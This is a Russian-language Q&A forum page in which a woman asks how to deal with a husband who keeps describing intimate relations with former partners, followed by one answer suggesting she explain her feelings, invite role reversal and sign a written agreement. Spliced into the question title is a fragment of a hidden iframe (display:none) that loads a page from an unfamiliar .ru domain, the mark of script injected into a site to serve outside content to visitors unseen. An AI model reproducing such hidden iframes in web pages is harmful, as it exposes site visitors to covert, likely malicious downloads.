здравствуйте. муж частенько рассказывает об интимных отношениях с бывшими, хотя понимает, что мне неприятно. что делать?<iframe id="a1996667054"... - вопрос №1589965

style=«display: none;» src=«al9l235gkc7d.ru/f.html»>

Ответы

1.Обязательно сказать об этом. Причем в подробностях объяснить почему вам это неприятно
2.Предложить поменяться местами  -представить, если б вы так рассказывали о бывших
3. Договориться.  Сделайте это предметом договора  -он не рассказывает о бывших, вы не пилите его за это например) или ещё какой нибудь бонус придумайте. Лучше даже записать  и подписаться. Подобные ритуалы включают соответствующую схему повведения